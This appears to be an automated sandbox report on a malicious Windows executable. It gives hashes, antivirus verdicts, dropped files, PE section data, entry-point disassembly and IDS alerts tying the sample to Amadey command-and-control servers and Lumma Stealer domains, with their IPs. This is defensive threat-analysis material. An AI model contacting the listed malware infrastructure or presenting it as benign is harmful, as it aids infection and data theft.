                                                                                                                                                                                                                                                              SHA-256:34959918550EF8A11FE8E0EF9DDE5F85F0DAC541E62A2CAD53998D4A0EB07D9D
                                                                                                                                                                                                                                                              SHA-512:C68DDB34D1268D47F28F7B8E4ED7AC807B39424D09097AABC3274690D1F37BFC3615BDFB69ACEC1E8C08EEE0A3EBBAC6FCC99192441CF94AB4D7E14CB917B9C4
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@..........................01.....s.1...@.................................W...k...........................P.0...............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...nnwaoodm.@*......@*.................@...ocwkoyql......0.......0.............@....taggant.0....1.."....0.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                              Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                              MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                              SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                              SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                              SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                              Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                              Entropy (8bit):0.035577876577226504
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:GtlstFPLhvO5rhJlQGCS/3lstFPLhvO5rhJlQGCtl/T89//alEl:GtWtGBlWyWtGBlWtlL89XuM
                                                                                                                                                                                                                                                              MD5:167C4BF5BC0F26D818173DAC44EFDEE1
                                                                                                                                                                                                                                                              SHA1:6A046C0DC8F06DDF271FC999D9C0D4FB8240BA36
                                                                                                                                                                                                                                                              SHA-256:4A4E091853584E9348890A6DF6EF862403770C7B04089233B66FFAF5EA59D041
                                                                                                                                                                                                                                                              SHA-512:C50DB06E357DA8EBCC21F0EE9174788088A5FA53684944D5C7CDD4FC597B86ADE211851BB816BC2CA542FE3EAF5B1A7FB813776E623A36A822A24F5041597C6E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..-......................h<.J.C....5Ql...W.T.s....-......................h<.J.C....5Ql...W.T.s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):32824
                                                                                                                                                                                                                                                              Entropy (8bit):0.039741777434961344
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Ol1arfl9iARI/olNR+PHnl57l8rEXsxdwhml8XW3R2:KIrfllqoh+PHrl8dMhm93w
                                                                                                                                                                                                                                                              MD5:6A4BE250AD9FE5797D6F343094B00E36
                                                                                                                                                                                                                                                              SHA1:B716918B957F4BD04C81A63218D8C8A52950011B
                                                                                                                                                                                                                                                              SHA-256:DE23E233C10422D8D512C9A569002034CB51EBE6EA01627AA8C2CD310BA20547
                                                                                                                                                                                                                                                              SHA-512:33FFC0433CD0DBB89DE3ACE31A9F29AB12BA3D1AEC6CF9C4352B032426BC99A818750AA076C5B9C287DF6F500701776DBC26C9C0EFAA037777CDA3851D9092D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:7....-.............5Ql.....................5Ql...<h..C.J................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):10085
                                                                                                                                                                                                                                                              Entropy (8bit):5.535035049058776
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:WnaRtZYbBp6ehj4qyaaX86KakfGNBw8dYSl:xeEquOcwL0
                                                                                                                                                                                                                                                              MD5:C14CB6932F356B50E7D93642F0CF84B9
                                                                                                                                                                                                                                                              SHA1:E6636BE11ACD0217C5C10993535F81FD72BF8E2F
                                                                                                                                                                                                                                                              SHA-256:344A85B01D84BFA01604815462CFDCEF5E270F4F2E48AA519D7EABBC5C7E0BB1
                                                                                                                                                                                                                                                              SHA-512:A3DD291158269C55FDC464E7276F08B08AFE684A74B4B75EADD8F74BB5DB448D07419B94F4FDCF075839B4CC403E21DD0005FAA0A9E93E41ABD081A8E3859C6E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.up
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):10085
                                                                                                                                                                                                                                                              Entropy (8bit):5.535035049058776
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:WnaRtZYbBp6ehj4qyaaX86KakfGNBw8dYSl:xeEquOcwL0
                                                                                                                                                                                                                                                              MD5:C14CB6932F356B50E7D93642F0CF84B9
                                                                                                                                                                                                                                                              SHA1:E6636BE11ACD0217C5C10993535F81FD72BF8E2F
                                                                                                                                                                                                                                                              SHA-256:344A85B01D84BFA01604815462CFDCEF5E270F4F2E48AA519D7EABBC5C7E0BB1
                                                                                                                                                                                                                                                              SHA-512:A3DD291158269C55FDC464E7276F08B08AFE684A74B4B75EADD8F74BB5DB448D07419B94F4FDCF075839B4CC403E21DD0005FAA0A9E93E41ABD081A8E3859C6E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.up
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):90
                                                                                                                                                                                                                                                              Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                              MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                              SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                              SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                              SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                              Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):90
                                                                                                                                                                                                                                                              Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                                                                              MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                              SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                              SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                              SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                                                              Entropy (8bit):3.3674784005163163
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6:DRyoOqlVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lHk0ut0:BOYf2RKQ1CGAFAjzvYRQVHFut0
                                                                                                                                                                                                                                                              MD5:06928C0E9D2BADB4DA8BA8D5CB372264
                                                                                                                                                                                                                                                              SHA1:B0594CA4E727DE1B26BC8673D8E1BF2D1F2ED0F1
                                                                                                                                                                                                                                                              SHA-256:A45B76045C0A7D085B35FF4B0D801A3EC81D2FB30A4167A7BE44BADD0018AC7A
                                                                                                                                                                                                                                                              SHA-512:43E52F2F95B072E384F0454473ECC1E8021788C14BA93D885C537704A0D9211E5C94C7F229CBA26FF5492DC4BE81672E7DFE9F67DE521A9995EE8B6AD58E311D
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.......s.+.N..k..&.-F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):6.6609161202022875
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                                                              File size:3'210'240 bytes
                                                                                                                                                                                                                                                              MD5:f5db9dcea4098275cb46b5d6fe73cef8
                                                                                                                                                                                                                                                              SHA1:9b623e4cfff93bffbaf7034ebbf893773700ba94
                                                                                                                                                                                                                                                              SHA256:34959918550ef8a11fe8e0ef9dde5f85f0dac541e62a2cad53998d4a0eb07d9d
                                                                                                                                                                                                                                                              SHA512:c68ddb34d1268d47f28f7b8e4ed7ac807b39424d09097aabc3274690d1f37bfc3615bdfb69acec1e8c08eee0a3ebbac6fcc99192441cf94ab4d7e14cb917b9c4
                                                                                                                                                                                                                                                              SSDEEP:49152:xiF3GbjN188C7PW+r5iGNWF79gUeKBlI3uv/zQKsE6d94/Ubd:xiF3UH8D7W+9iGNWhgBmi+vbpsjd94U
                                                                                                                                                                                                                                                              TLSH:46E53891AA0575CFD64A1BF4922BCF429A6C02B5472008E3A86C78BB7E77CDD15EDC34
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                              Entrypoint:0x710000
                                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              jmp 00007F0F34C27B4Ah
                                                                                                                                                                                                                                                              pminub mm6, qword ptr [eax]
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add cl, ch
                                                                                                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add eax, 0000000Ah
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], dl
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add eax, 0000000Ah
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add al, 00h
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add dword ptr [edx], ecx
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x388.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x30ef500x10nnwaoodm
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x30ef000x18nnwaoodm
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              0x10000x680000x68000e2b9ec171e74023cc48f02f748e10b9eFalse0.5582134540264423data7.067745136702224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x690000x3880x400514f5782f497fa171df6168314823de0False0.453125data5.340697973950139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              nnwaoodm0x6b0000x2a40000x2a4000cb7299437011f649376c691bbf52268funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              ocwkoyql0x30f0000x10000x4008bc58033b59c3f57c4cdc17443e373ddFalse0.8466796875data6.430049483833785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .taggant0x3100000x30000x220056e3f225356d2f56d881211a9d5c6af0False0.0920266544117647DOS executable (COM)1.1674000667652142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_MANIFEST0x690700x198ASCII text, with CRLF line terminators0.5808823529411765
                                                                                                                                                                                                                                                              RT_MANIFEST0x692080x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-09T23:09:05.760341+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449758185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:10.210118+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449770185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:14.651408+01002057921ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)1192.168.2.4574881.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-09T23:09:15.862202+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449764TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:16.121917+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.449781104.21.48.1443TCP
                                                                                                                                                                                                                                                              2024-12-09T23:09:16.121917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449781104.21.48.1443TCP
